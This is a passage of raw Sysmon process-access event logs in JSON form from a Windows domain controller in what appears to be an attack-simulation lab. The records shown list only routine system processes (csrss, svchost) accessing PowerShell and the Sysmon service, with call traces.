ll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976daae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976da0b2(wow64)","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4351,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-001067620600}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-001067620600}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4352,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4353,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4354,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4355,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4356,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4357,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4358,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4359,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 